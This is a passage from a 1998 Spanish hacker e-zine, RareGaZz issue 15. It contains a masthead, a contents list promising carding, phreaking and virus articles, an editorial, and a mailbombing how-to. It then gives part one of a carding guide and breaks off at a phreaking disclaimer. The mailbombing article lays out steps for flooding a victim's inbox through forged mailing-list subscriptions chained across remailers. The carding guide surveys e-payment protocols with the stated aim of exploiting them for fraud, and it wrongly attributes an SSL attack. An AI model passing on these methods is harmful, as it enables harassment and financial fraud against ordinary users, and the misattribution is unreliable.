RareGaZz nº15:(RARE015.TXT):20/12/1998 << Back To RareGaZz nº 15
---------------------------------------------------- Año 2/Numero 15 │ Noviembre de 1998 ─────────────────────────────────────────────────────────────────────────────── │ ---------------------------------------------------- ooooooo oo ooooooo oooooo ooooo oo oooooo oooooo $$""$$" o$"$$ $$""$$" $$ o$$""o, o$"$$ """$$ """$$ $$o$$" $$ $$ $$o$$" $$$$$$ $$ $$ $$ $$ $$ $$ $$$$$ $$ $$ $$$$$ $$"""" "$o $$ $$ $$ $$" $$" $$" $$ $$$$$$$ $$" $$ $$ "$o $$ $$$$$$$ o$" o$" $$ "$$ $$ $$ $$ "$$ $$ooooo "$o$$ $$ $$ o$$oooo o$$oooo "" """ "" "" "" """ """"""" "" "" "" """"""" """"""" ---------------------------------------------------- │ ─────────────────────────────────────────────────────────────────────────────── "La verdad nos hara libres" ---------------------------------------------------- Editor: GuyBrush Co-editores: Azumlord, Cytorax, Senpai, PaTa, Yo_Soy y 12r RareGaZz Team : 12r, Arkangel, AzumLord, Cytorax Grovvy, Guybrush, KillerBot Mr.X, Orion, PaTa, RareTrip, Senpai, ServerHacker, Vov_77 y Yo_soy. Agradecimientos: Dr_Format^, Unamed Person, SatMex, \Wend|g0, ToMaCHeLi, ZeD, CHack, Mr. Aztech," >< TONE " y John Distribuidores Oficiales: raregazz.acapulco.uagro.mx raregazz.islatortuga.com E-mail Ofical: raregazz@iname.com Saludos (Oficiales): #RaZa MeXicaNa Team, X-ploit Team, SET y JJF Hackers. Frase del Dia (Oficial): "ip!, ip!, echame las otras" Azumlord despues de una mala noche. Rayadas de Madre (Oficiales): jmasojan, el lamer de mierda que borro los archivos del ftp de la lista de los RareDudeZz y el(los) idiota(s) lamer(s) que avisaron a los de geocities sobre la pagina de SET. Comentarios (Oficiales): Mas vale tarde que nunca :-) ┌──[ C o n t e n i d o s ]────────────────────────────────┐ ┌─┤ │ │ │ +Editorial ------------------------> GuyBrush │ │ │ +Tecnicas de Mailbombing ----------> Senpai/GuyBrush │ │ │ +Fraude electronico (Carding) -----> PaTa │ │ │ +Telefonos celulares (Phreacking) -> Azumlord │ │ │ +Guia para Hackear Hotmail --------> \Wend|g0 │ │ │ +Crackear PWL's con el PLWOSR -----> CHack │ │ │ +Agentes Inteligentes -------------> 12r │ │ │ +Varios trucos interesantes -------> SatMex │ │ │ +Maneras de colarse en el HD (IRC)-> ToMaCHeLi/ZeD │ │ │ +IRC (guia rapida) ----------------> Yo_Soy │ │ │ +Cisco Routers --------------------> GuyBrush │ │ │ +Hack basico ----------------------> Mr. Aztech/ │ │ │ " >< TONE "/John │ │ │ +Guia de instalacion de CPI's -----> Unamed Person │ │ │ +Virus Batch (2a Parte) -----------> Yo_Soy │ │ │ +Corba ----------------------------> 12r │ │ │ +Blue Boxing en Argentina ---------> Dr_Format^ │ │ │ +Entrevista a X-Ploit Team --------> GuyBrush │ │ │ +Bugs & Exploits ------------------> PaTa │ │ │ +Historias del IRC (segunda parte)-> GuyBrush │ │ │ +Noticias -------------------------> GuyBrush │ │ │ +Cartas del Lector ----------------> GuyBrush │ │ │ +Llaves PGP -----------------------> RareGaZz Staff │ │ │ +Despedida ------------------------> GuyBrush │ │ └───────────────────────────────────────────────────────┬─┘ └─────────────────────────────────────────────────────────┘ "Plante un olivito, que espero que crezca sano y saludable a mi lado" << PaTa >> 01010101010101010101010101010101010101010101010101010101010101010101010 10 01 01 #!/bin/RareGaZzsh 10 10 # La informacion contenida en este zine tiene fines completamente 01 01 # de entretenimiento y educativos, los autores de la informacion 10 10 # aqui presentada no se hacen responsables de los posibles daños 01 01 # que se puedan ocasionar...... 10 10 01 01010101010101010101010101010101010101010101010101010101010101010101010 ─[ E d i t o r i a l ]──────────────────────────────────────────────────────── Este ezine es muy especial para mi ya que es el ultimo que edito. Para bien o para mal, debo dejar RareGaZz temporalmente. Resulta que me cambio de domicilio y de momento andare unos meses sin telefono, pero no se preocupen que seguire sus actividades aunque sea desde un cyberc@fe. Azumlord se queda encargado de la direccion de RareGaZz y yo dejare de leer mi correo ya que estare algo desconectado de este mundillo durante algun tiempo. Pero quiero que sepan todos que, de una manera u otra, GuyBrush estara siempre con ustedes. -= GuyBrush =- http://raregazz.acapulco.uagro.mx http://raregazz.islatortuga.com raregazz@iname.com -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= oOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoO -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= ─[ Tecnicas de MailBombing - Senpai/GuyBrush ]──────────────────────────────── Como todos sabeis, el mailbombing es el 'arte' de joderle a alguien el buzon de correo. Al igual que en todo, existen algunas tecnicas menos lamers que otras. Ademas, cualquier persona con dos dedos de frente y algunos minimos conocimientos debe ser capaz de rechazar este ataque. La peor forma de realizar un bombardeo es coger el tipico programa de mail- bombing y enviar 500 mails o ficheros de 20 Mb sin ni siquiera comprobar si el server muestra tu IP ... y luego vienen los problemas. Bien, pues en el caso de que alguno sufra un ataque asi, no hay mas que acceder por telnet al buzon de correo (puerto 110) y borrar todos los mails. Como mucho perdemos algun mensaje que nos interese, pero ya esta. Ademas, si el que nos bombardeo puso el mismo subject en todos los mails, mas facil todavia para borrarlos. Otra tecnica mejor, seria suscribir a nuestra victima a muchas listas de correo. Y si estan en distintos idiomas mejor. Pero esto tambien puede solucionarse rapidamente. Basta con leer bien los mails y enviar el 'unsuscribe' correspondiente. Ademas, la mayoria de listas de correo piden una confirmacion antes de suscribir a nadie. Pero esto tambien lo puede preveer el atacante y falsificarlo, al igual que el mail de suscripcion. Pensando en algo mas sofisticado, podriamos crear una cuenta en hotmail y usar un remailer que nos redireccione alli el correo (por ejemplo, en iname o en bigfoot). Una vez suscritos a las listas y enviadas las confirmaciones correspondientes, ya podemos modificar el 'forward' del remailer para enviarlo a un nuevo destinatario ... imaginais quien? si, la pobre victima. Claro esta que si el usuario atacado es un poco 'cuco' puede ver el origen de esos mails (vienen del ramailer) y falsificar el 'unsuscribe'. Pero, que ocurriria si en vez de un remailer usamos dos? podemos suscribir el primero y redireccionar los mails al segundo; y de alli a la victima. De esta forma seria imposible que se dessuscribiera ya que nunca sabra cual es la direccion que realmente esta suscrita. Bueno, pues eso es todo. Si se os ocurre alguna tecnia mejor ... enviarla. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= oOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoO -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= ─[ Fraude electronico (Carding) - PaTa ]────────────────────────────────────── ╔════════════════════════════════════════════════════════════════════════════╗ ║╔══════════════════════════════════════════════════════════════════════════╗║ ║║╔════════════════════════════════════════════════════════════════════════╗║║ ║║║ FRAUDE ELECTRONICO > CARDING < LA GUIA DEFINITIVA ║║║ ║║║ por PaTa ║║║ ║║╚════════════════════════════════════════════════════════════════════════╝║║ ║╚══════════════════════════════════════════════════════════════════════════╝║ ╚════════════════════════════════════════════════════════════════════════════╝ CONTENIDOS 1ª PARTE 1 ................ Descripcion 2 ................ Introduccion 2.1 .............. Tipos de pago 2.2 .............. Cifrado de datos 3 ................ Tipos de protocolos 3.1 .............. Cheques Electronicos FSTC 3.2 .............. First Virtual 3.3 .............. CyberCash C-5 3.4............... DigiCash 3.5 .............. Virtu@l Cash 3.6 .............. SSL 3.7 .............. Despedida 2ª PARTE 3 ................. Introduccion 4 ................. Obtener tarjetas de credito 4.1 ............... Robar tarjetas 4.2 ............... Robar tarjetas sin violencia 5 ................. Trashing 6 ................. Verificar la tarjeta 7 ................. Ingenieria social 8 ................. Recojer el paquete 9 ................. Estructura de la tarjeta de credito 10 ................ Crear tarjetas 10.1 .............. Algoritmo para la creacion de tarjetas de credito 11 ................ Compra por telefono 12 ................ Varios 13 ................ Conclusiones 14 ................ Agradecimientos >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>><<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< 1.- DESCRIPCION Bueno este articulo que vas a leer ahora es el resultado de un duro trabajo y el seguimiento de algunas lista de correo sobre el tema, al inscri- birme me interesaba la idea pero segun iban pasando los dias me intereso mas y mas, por lo que decidi profundizar en el tema, la primera parte que vas a leer te puede resulta un poco aburrida, pero nunca te has preguntado, ¿Como se realizan las compras por Internet? Yo si, y me dispuse a buscar informacion, bueno y aqui esta. Es una informacion tecnica y puede que en algunos casos se te haga pesada, pero esta enfocada desde el punto de vista de la seguridad obviando otros temas necesarios en las comunicaciones que no nos interesan. En la segunda parte podras encontrar informacion para hacer carding pero para saber correr antes hay que saber andar. La segunda parte la podras leer en el siguiente numero de la revista. 2.- INTRODUCCION El salto del milenio apunta hacia nuevos habitos de consumo. El consumidor del siglo XXI buscará la comodidad en sus compras. Los estudios sobre el comercio electronico e-commerce, vaticinan, segun la prestigiosa Forrester Research (www.forrester.com) crezca de los 121 millones de dolares de 1997 a los 3800 en el 2002, solo en EE.UU. ¿Entonces porque no intentar sacar algo de provecho nosotros ciudadanos de a pie? El contra-reeenbolso, es un medio perfecto para el usuario, aunque claro hemos evolucionado desde el rudimentario trueque, hasta la moderna plástico ( pasando por los metales preciosos y el papel moneda),...., contra- reenbolso,... para finalmente llegar al comercio electronico, en todos los sitemas ha habido formas de engañar y sacar partido , quien ha dicho que en este ultimo no? Como es bien conocido, los medios de pago tradicionales sufren numerosos problemas de seguridad: falsificación de billetes, falsificación de firmas, cheques sin fondo, etc. Por otro lado, los medios de pago electrónicos, además de estar sujetos a los mismos problemas anteriores, presentan riesgos adicionales, pues a diferencia del papel, los documentos digitales pueden ser copiados perfectamente y cuantas veces se desee, las firmas digitales pueden ser falsificadas por cualquiera que conozca la clave privada del firmante, la identidad de una persona puede ser asociada de forma inequívoca con la infor- mación relacionada en cada pago, etc. Las tarjetas de credito son el instrumento mas utilizado en el comercio electronico. Supone un cobro rapido para el vendedor a cambio de una pequeña comision. Ademas de que todo el mundo tiene una, se estan convirtiendo en parte importante de nuestra vida, no salimos sin ellas. Me voy a centrar en que el pago se ordena a traves de Internet, mientras que la validacion y realizacion efectiva, se realiza a traves de los circuitos normales que las entidades poseen a tal efecto, de forma independiente de si la transacion ha sido ordenada desde Intenet o no. Aqui pongo los sistemas que mas se utilizan en Internet. Me dejo cosas como el SET pero eso sera para otro articulo ya que me parece un tema muy interesante 2.1 TIPOS DE PAGO Los dos sistemas clasicos por excelencia de pago no efectivo son los cheques convencionales y las tarjetas de credito. En el sistema financiero, el dinero toma forma de entrada en los libros de los bancos y de otras instituciones financieras. Esto para el usuario se refleja en la existencia de una cuenta deposito en la que se graban los depositos del cliente y se realizan pagos en forma de cheques o transferencias. Un cheque es un documento escrito por el usuario de la cuenta y autentificado por el mismo que se entrega a un comerciante, quien a su vez lo acepta antes de presentarlo en su banco. Si el banco cobrador y el del vendedor son los mismos, todo se reduce a una compensacion interna de apuntes. Si por le contrario, ambos disponen de cuentas en bancos distintos, el banco cobrador debera presentar el cheque y recojer los fondos a traves de un sistema de ajuste o camara de compensacion ACH (Automatic Clearing House). Esta camara puede pertenecer al estado, por ejemplo, al banco emisor de la moneda, o tratarse de un sistema intermediario privado, como VisaNet ACH Service. En el momento de la entrega del cheque, el cobrador no sabe si este se encuentra respaldado por fondos por lo que corre cierto riesgo. Pero los pagadores tambien asumen determinados riesgos frente a la posible existencia de cheques falsos ya que reciben los extractos de las cuentas despues de pagar sin confirmacion previa al pago. Otra alternativa es la utilizacion de un sistema de credito, como una tarjeta o un servicio bancario de adelantos de descubiertos. EL comerciante se asegura el pago y el emisor asume la responsabilidad del cobro. El ajuste se realiza entonces cuando el comerciante envia un lote de autorizaciones a su banco entre este y el banco emisor de la tarjeta Existen dos tipos de operaciones con tarjeta de credito que suponen distinto balance de riesgo en funcion de si la tarjeta se encuentra presente o no. En el primer caso, la tarjeta presente, todo el riesgo del credito pasa al comerciante. En estos casos el comerciante puede verificar la firma del titular comparando la que este imprime en el recibo con la que aparece en la tarjeta. Por ello, sera responsabilidad suya si se hace uso fraudulento de la tarjeta de un tercero. La integridad de la transacion queda garantizada para el cliente mediante un papel-copia del recibo. El nombre de la cuenta se autentifica a traves del numero de la tarjeta y la transacion puede ser confirmada enviando los datos por medio de una red privada de la asociacion. En el segundo caso, la tarjeta no presente, el consumidor asume cierta parte (pequeña) del riesgo ante un posible fraude ya que es responsabilidad suya proteger el numero de tarjeta, debido a que este es el unico medio de identificacion del pagador en la transacion ( como mucho se podra pedir la fecha de caducidad y direccion y comprobarlas). Este es el sistema empleado en los pedidos por telefono o internet (en pedidos como correo o fax, aun se cuenta con la firma del titular como medio de no repudiacion, que no de autentificacion). Por ello, dado que nada impide que se pueda colocar un sniffer (programa que monotoriza todos los datos que pasan por cierto ordenador) en la red, los numeros de tarjeta deben viajar encriptados por la red. Hay diferencia entre el uso de cheques y de tarjetas. Un pago mediante cheques supone dinero pagado para el consumidor, que asumira todos los inconvenientes derivados de una falla del comerciante. SIn embargo, si se paga con tarjeta se puede pedir la restitucion del importe. EL problema pasa a ser del banco emisor de la tarjeta, que debera pedir cuentas al del comerciante. Considerando que el cyber-espacio no pueden ser iguales las transaciones que de la forma clasica se deben tener en cuenta: - Seguridad: La criptografía moderna proporciona complejos mecanismos matemáticos que evitan el fraude. Por otro lado, la seguridad es un tema complejo que involucra muchos otros factores: protocolos, estándares, autoridades de certificación, etc. - Verificacion de la autorizacion de las transaciones, para evitar fraudes. En el modelo clasico esta verificacion se hace mediante firmas en tarjetas de credito o en cheques, en el mundo electronico se suelen usar aunque no siempre las firmas digitales. - Confidencialidad : Ciertos datos intercambiados durante una transacción de pago necesitan ser ocultados a la vista de todo el mundo salvo para el agente al que van destinados dichos datos. La confidencialidad es normalmente garantizada mediante el cifrado de datos. Sin embargo, ésta cuestión está resultando ser un problema en la mayoría de los países debido a las restricciones impuestas por los diferentes gobiernos para utilizar algoritmos criptográficos de cifrado de datos con un alto nivel de seguridad. En algunos países ( Francia) el cifrado de datos está absoluta- mente prohibido sin el permiso de la oficina gubernamental correspondiente y normalmente sin el depósito previo de las claves de cifrado en dicha oficina. En otros países (EE.UU.) se restringe la utilización de estos algoritmos al territorio nacional, debiendo utilizar una versión mermada del algoritmo si se quiere utilizar más allá de sus fronteras. - Garantia de la integridad de las ordenes, con el fin de evitar abusos por parte de los comerciantes. En el sistema habitual se emplean papeles especiales, en el mundo electronico se emplearan certificados digitales, descripciones encriptadas del intermnediario, y se utilizaran recibos digitales. - Confidencialidad: No solo proteger los numeros y campos claves sino la privacidad del usuario, ocultando incluso a los ojos de los intermediarios. - Integridad: Otro aspecto importante en todo sistema de pago electró- nico es la integridad de los datos intercambiados entre los agentes del sistema, máxime cuando esos datos se refieren a importes de un pago, a un número de cuenta bancaria, etc. La integridad de las comunicaciones es garantizada mediante códigos de autenticación de mensajes (MACs), funciones resumen y firmas digitales. En el caso de la relación cliente - comercio, esto sólo es posible cuando el cliente está en posesión de un dispositivo con capacidad de cálculo y de almacenamiento seguro de claves, como es el caso de una tarjeta inteligente. Así por ejemplo, las claves criptográficas de clientes y comercios suelen almacenarse en tarjetas inteligentes y módulos de seguridad (SAMs) respecti- vamente. Los datos en los servidores de las entidades financieras que inter- vienen en el sistema de pago de son almacenados en búnkers de seguridad que normalmente se encuentran duplicados para evitar las posibles pérdidas de información como consecuencia de posibles fallos. - Ajuste de cuentas: Se recurria a las redes financieras clasicas. - Autentificacion: En todo sistema de pago los participantes del sistema deben demostrar que son los que dicen ser. Para evitar los fraudes. En el caso de tarjetas inteligentes (con microprocesador, dotadas por tanto de una capacidad de cálculo) esto se realiza mediante algún protocolo criptográfico de autenticación, mientras que en el caso de tarjetas con banda magnética, se realiza mediante una verificación visual de ciertos datos grabados en la superficie de la tarjeta (hologramas, firmas, etc.). En los sistemas basados en tarjetas, se suele verificar también la asociación correcta de la tarjeta con su poseedor (Titular de la cuenta asociada a la tarjeta). Esto se realiza normalmente a través de números de identificación personal (PIN). Lo mismo ocurre en los sistemas de pago a través de redes donde se necesita una autenticación de la persona física que utiliza en un instante determinado el sistema. - Confirmacion de la transacion. Para evitar que nadie suplante nuestra personalidad. - Anonimato: Si una persona realiza un viaje en un medio de locomocion no privado, y paga en efectivo no hay forma de monotorizarle, pero si en cambio paga con una tarjeta de credito, (quien quiera ver un ejemplo practico que se lea "El Informe Pelicano"). Pero si lo paga con trajeta de credito puede ser posible recontruir su recorrido, e incluso los sitios por donde ha pasado y pagado con su tarjeta. Esto mismo ocurre con todo tipo de compras. No obstante, el anonimato constituye sin duda uno de los aspectos más polémicos de estos sistemas, ya que mientras para unos sería base irrenun- ciable de la libertad económica y el derecho a la intimidad, para otros podría constituir una puerta abierta a la delincuencia y el blanqueo de dinero. - Independencia: El uso de dinero digital no debería estar restringido a una red, organización o país concreto, sino que debería ser independiente de esas limitaciones y fácilmente utilizable desde cualquier punto del planeta. Aqui una pequeña descripcion de los medios de pago, no voy a entretenerme mucho con ellos ya que se podria hablar bastante: 2.2 CIFRADO DE DATOS Tenemos que tener en cuenta que nuestro dinero viaja por la red y cualquiera puede tener acceso a ello, por lo que sera basico que nuestras transacciones vayan encriptadas. Internet en un medio basicamente inseguro por lo que las medidas de seguridad deben ser altas. La mayor parte de protocolos que utilizan los siguientes sistemas utilizan algoritmos criptográficos de clave pública (RSA), de clave secreta (DES), o ambos a la vez, para cifrar todos los datos importantes, de forma que sólo puedan ser accesibles a las partes involucradas en las operaciones, y todos ellos tienen buen cuidado en que su empleo sea absolutamenarente para el usuario. Aunque puedas pensar que el cifrado sea absolutamente necesario, no utilizaba ninguna clase de cifrado, se basaba en el uso del correo electronico El sistema de pagos de First Virtual ha sido retirado recientemente de este mercado, pese a habersido uno de sus pioneros. 3 TIPOS DE PROTOCOLOS 3.1 CHEQUES ELECTRONICOS FSTC (Financial Services Technology Consortium) El pagador debe contar contar con un procesador seguro, que se implementa en forma de tarjeta inteligente. Este procesador es el encargado de generar los cheques que consisten, simplemente en ordenes de pago firmadas digitalmente. Los cheques se trasmiten al comerciante que tambien los acepta firmandolos, tambien digitalmente y los envia al banco, que los hara efectivos a traves de la una red ACH clasica. ┌──────────────────────────────────────────────────────────────────────────┐ │ Esquema de funcionamiento de cheques FSTC │ │ ««»»««»»««»»««»»««»»««»»««»»««»»««»»««»»««»» │ │ │ │ │ │ │ │ Pagador ─-─> Cueque │ │ Firma Pagador │ │ Certificado Kpp ──--> Cobrador ─--> Cheque │ │ Firma pagador │ │ Certificad Kpp │ │ Firma Cobrador │ │ Certificado Kpc │ │ │ │ │ │ │ │ Banco Cobrador <-─ ACH ─--> Banco pagador <-────┘ │ │ │ └──────────────────────────────────────────────────────────────────────────┘ 3.2 FIRST VIRTUAL (FV) Fue uno de los primeros en aparecer con al pecularidad de no hacer uso de la criptografia. Un consumidor que desee hacer uso del sistema primero debe registrarse en el mismo, tras lo que obtiene un Virtual PIN, ID o identificador de First Virtual. Para ello debe de enviar un numero de tarjeta de credito, VISA o MasterCard, por medio off-line, como telefono o fax. Una vez registrado, quiera hacer una compra a un comerciante o acceder a informacion restringida en un servidor que emplee el sistema ┌──────────────────────────────────────────────────────────────────────────┐ │ Esquema del sistema First Virtual │ │ ««»»««»»««»»««»»««»»««»»««»»««»»««»»««»»««»» │ │ │ │ PAGADOR Virtual Pin (1) ────────--> PAGADO <-──────────┐ │ │ / \ <-──────── (4) informacion / \ │ │ │ │ │ │ │ │ │ │ │ │ │ | │ │ │ │ Quieres | | │ │ pagar? Solicitud (2) Respuesta │ │ (5) ─-->─────-<-─- FIRST -->─────--───-<--Autorizacion (3) │ │ Respuesta VIRTUAL ->─────--───-<-────────────────────┘ │ │ | │ │ │ │ │ │ (7) │ │ \ / │ │ BANCO PAGADOR <─────-- ACH ───────-->BANCO COBRADOR │ │ │ └──────────────────────────────────────────────────────────────────────────┘ Para obtenerlo recibiremos un mail con una clave de doce digitos, y un numero de telefono donde confirmarlo. Mantener un PIN cuesta 5 dolares al año aproximadamente. Como vemos los datos se envian por un medio off-line. Le bastara presentar su Virtual PIN al mismo. El comerciante se conectara a un servidor FV para comprobar si es correcto, y de ser asi, enviara la mercancia o dara paso libre a la informacion. Para realizar un pago al comerciante, First Virtual, envia un e-mail la consumidor en el que le indica la operacion y le pregunta si desea paga o no. El consumidor puede responder "yes", "no", "fraud". Mediante este sistema el comerciante no llega nunca a saber el numero de tarjeta del consumidor, ni llega nunca a viajar por la red. El protocolo de validacion de FV es el mas lento de todos los medio de pagos electronicos, no hace uso de la criptografia lo que da al usuario una falsa sensacion de seguridad , si se dota de anonimicidad al usuario frente al comerciante. 3.3 CYBERCASH: C-5 Es uno de los medios de pago electronicos pioneros. La empresa fue creada en 1994 y el sistema CyberCash se encuentra operativo desde abril de 1995. Se trata de un sistema integrado con el WWW que utiliza un protocolo propio manejado por un software que debe ser distribuido tanto a comerciantes como a consumidores. Constituye una pasarela entre Internert y las redes de autorizacion de emisores de tarjetas, contando para ello con la experiencia ganada con el sistema Verifone, de autorizacion de tarjetas por telefono, del cual deriva. El consumidor cuenta con un software "wallet", o monedero que puede ligar a varias cuentas bancarias o a las tarjetas de credito. El sotfware encripta todos los datos, realiza un registro de todas las transa- ciones y se encuentra protegido mediante contraseña. En el lado del comer- ciante se situa un software similar. Cuando un usuario baja el softwre de CyberCash, genera un par de claves publica, Kp, y privada, Ks para el. El sistema empleado es RSA de 1024 bits. A continuacion envia Kp al servidor de CyberCash que almacena en una base de datos. De esta forma solo CyberCash sabe las claves publicas de todos los interlocutores posibles. La comunicacion entre consumidor y comerciante se lleva a cabo en claro, mientras que la comunicacion de estos con CyberCash se realiza de forma protegida. Para ello se emplea una clave de sesion DES aleatoria de 56 bits que se ditribuye encriptada con la llave publica del interlocutor. CyberCash tiene incrustada su propia llave publica en el software por lo que cualquiera puede comunicarse con el. Un dato importante es que al clave DES es de 56 bits cuando por las leyes de la legislacion americana antes fijaban un maximo de 40 bits, y es que CyberCash consigio un permiso especial. La transacion se lleva a cabo de la siguiente manera: 1.- El cliente seleccicona un item a adquirir mediante www y elabora un pedido. 2.-El software del comerciante envia "la facturas proforma" al software " wallet". La factura proforma es texto en claro, firmado digitalmente en el que figura una descripcion de la compra asi como las tarjetas de credito aceptadas. Para la realizacion de firmas digitales se emplean funcines hash MD5 y claves secretas RSA. A su recepcion, el sofware "wallet" da a elegir al usuario entre aquellas tarjetas que tiene registradas y le pide autorizacion para realizar el pago. 3.- Previa confirmacion del usuario, el software "wallet" del cliente genera un mensaje de pago y lo envia la comerciante. Este mensaje consiste en un hashing de la factura junto con las instruccuiones de pago, todo ello firmado digitalmente y encriptado para CyberCash. 4.- A la recepcion del memsaje, el comerciante, que no puede descrifarlo simplemente añade la informacion al pedido (tambien firmada digitalmente) y lo remite a CyberCash. 5- CyberCash desencripta y compara los dos mensajes. Si coinciden los datos, solicita confirmacion, y a traves de la red financiera y trasmite la respuesta al comerciante para que este pueda cerra la transaccion con el cliente. Todo este proceso se lleva a cabo en un periodo de tiempo inferior a un minuto. El proceso descrito es el caso mas habitual, no obstante, el protocolo CyberCash es mucho mas complejo y contempla la posibilidad de reintregos, anulaciones y solicitud de estado. Una version antigua se puede encontrar en Internet en forma RFC. Respecto a la proteccion del consumidor cabe destacar que, al encriptarse la orden de pago para CyberCash y no para el comerciante este no ve el numero de la tarjeta de credito lo que unido al hecho de que se comprueba la descripcion de la compra, impide el abuso por parte de los comerciantes. En lo referente a la privacidad, aunque CyberCash tiene acceso a la descripcoin de la compra, esta no tiene porque incluir los detalles de la compra, puede constar como dato la referencia y el tipo solamente. De este modo el comerciante no ve al tarjeta y CyberCash no ve el producto. Sin embargo este sistema es susceptible a ataques de trafico, es decir del tipo "detecto que Fedez se conecta mucho al servidor de Playboy" (Saluda Fedez, que ya eres famosos en Inet) :o) ┌──────────────────────────────────────────────────────────────────────────┐ │ Esquema de funcionamiento Cybercash │ │ ««»»««»»««»»««»»««»»««»»««»»««»»««»»««»»««»» │ │ ┌──────┐ │ │ ┌───────┐ Solicitud (1) --------------------> │ │ │ │ │ │ <------------ (2) Factura proforma │PAGADO│ │ │ │PAGADOR│ Datos pedidos tarjeta (3)---------> │ │ │ │ │ │ <------------ (5) Respuestas └────┬─┘ │ │ └───────┘ / \ │ │ │ ┌──────────────────────────┘ │ │ │ │ │ │ │ Respuesta (5) │ │ │ │ │ │ │ │ Solicitud │ │ │ ┌─────┴───┐<-───- autorizacion──────┘ │ │ │CYBERCASH│ (4) │ │==============================│ │=================================│ │ │ GATEWAY │ │ │ └───┬─────┘ │ │ │ │ │ | Respuesta (5) │ │ \ / │ │ BANCO PAGADOR <-─────-ACH──────────-->BANCO COBRADOR │ │ │ └──────────────────────────────────────────────────────────────────────────┘ 3.4 DIGICASH Otro sistema es Digicash, la diferencia con CyberCash, radica en que es un sistema de pago anticipado, donde se adquiere previamente el dinero del banco y se almacena digitalmente en el software del comprador. Este sistema permite la compra anonima ya que no requiere autentificacion 3.5 VIRTU@L CASH Tambien existe Virtu@l cash, de Banesto, para poder usarla hay que tener una cuenta en Banesto. Trabaja en un servidor seguro, certificado por la RSA. La tarjeta Virtu@lCash es una tarjeta de debito, de manera que el importe de la compra se adeuda en la cuenta asociada en el momento de realizarse la operacion. La Tarjeta podra ser utilizada, exclusivamente a traves de los comercios adheridos a este sistema de pago, limitandose los importes de las compras al saldo disponible en la cuenta asociada a la tarjeta y a un maximo diario preestablecido. Repecto a la seguridad. El sistema se basa en el servicio de Comercio electronico de Banesto apoyado en una infraestructura de seguridad, dispone de un servidor seguro y ha obtenido el certificado electronico RSA que permite que las comunicaciones se realicen de forma cifrada. Asimismo, para poder asociarse a este servicio se exige a todos sus socios, que lleven a cabo proyectos de comercio electronico, el empleo de servidores seguros; ademas de disponer de medidas adicionales de seguridad tales como cortafuegos. En el momento del Pago, el usuario introduce los datos de su tarjeta y su Numero de Identificacion Personal, que solo el conoce, la transaccion viaja encriptada por la red y el pago se lleva a cabo en modalidad On-line contra el saldo disponible en la cuenta. 3.6 SSL Cuando encargamos algo desde un formulario desde nuestro navegador, que cualquiera puede hacer con unos conocimientos de HTML, hacemos una invi- tacion a que cualquiera pueda acceder a nuestros datos ya que esta informacion viaja por la red hasta que llega al destino, para evitar, que esa informacion no sea presa de sniffers, ni amigos de los ajeno :o) ¿Te encuentras tu ahi? Se utilizan servidores seguros SSL. El SSL es un conjunto de protocolos creados por Netscape que proporciona sesiones de comunicacion encriptadas, autentificacion del servidor, de los mensajes, y opcionalmente de los clientes. Esta compuesto por dos capas: SSL Record Protocol, encargado de encapsular protocolos de bajo nivel y la SSH Handshake Protocol que permite autentificarse y negociar los algoritmos de encriptacion. SSL es independiente de los protocolos y capacita al programador para realizar un desarrollo tranparente por encima de la capa TCP/IP. Los servidores seguros SSL los podremos notar porque en al esquina inferior izquierda cambia a una llave cerrada en el caso de netscape. En la url, cambia de Http:// a Https:// (Hipertext Transport Protocol Secure). EL gobierno americano permite un cifrado de 128 bits. Aunque claro "La seguridad es solo un estado mental". Tambien el SSL tiene problemas de seguridad, el 26 de junio de este año Murray Hill, informatico de Lucent Technologres hizo publica la manera de acceder a esa informacion y obtener el numero de tarjeta y datos criticos de la transacion. El ataque es posible pero poco probable. La vulnerabilidad no se produce sobre el SSL, sino sobre PKCS, (Public Key Cryptografhy Standard) encargado del intercambio de llaves en SSL. El ataque consiste en mandar mensajes cuidadosamente construidos contra el servidor seguro que produzcan sendos mensajes de error de vuelta, a partir de cuya informacion se puede sacar la llave critica para seguridad. Se necesitan en torno a un millon de mensajes hecho que debe llamar la atencion del administrador del sistema. 3.7 DESPEDIDA Bueno espero que te haya gustado esta primera parte sobre las posibi- lades del comercio electronico, y la forma de aprovecharse, lo dicho, cualquier duda o pregunta la puedes dirigir a pata666@bigfoot.com, aqui tienes mi llave pgp. Pues ya estan la pareja de articulos todos juntos, si quieres ver otros articulos de interes puedes visitar mi web http://membres.xoom.com/pata666. To be continued, please insert coin!!!! -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= oOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoO -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= ─[ Telefonos celulares (Phreacking) - Azumlord ]────────────────────────────── -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= NO TIENES UN CELULAR, QUE ONDA!?, OSEA NO!!! I -=( Azumlord )=- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= ─[ D i s c l a i m e r ]────────────────────────────────────────────────────── La informacion aqui presentada, tiene fines solamente educativos, cualquier uso indebido de la informacion aqui contenida es responsabilidad de usted! ( Demonios, eso lo dijeron en un comercial???), el autor no se hace responsable de los daños materiales o psicologicos que sean producto de un mal uso de lo aqui expuesto. ─[ J u 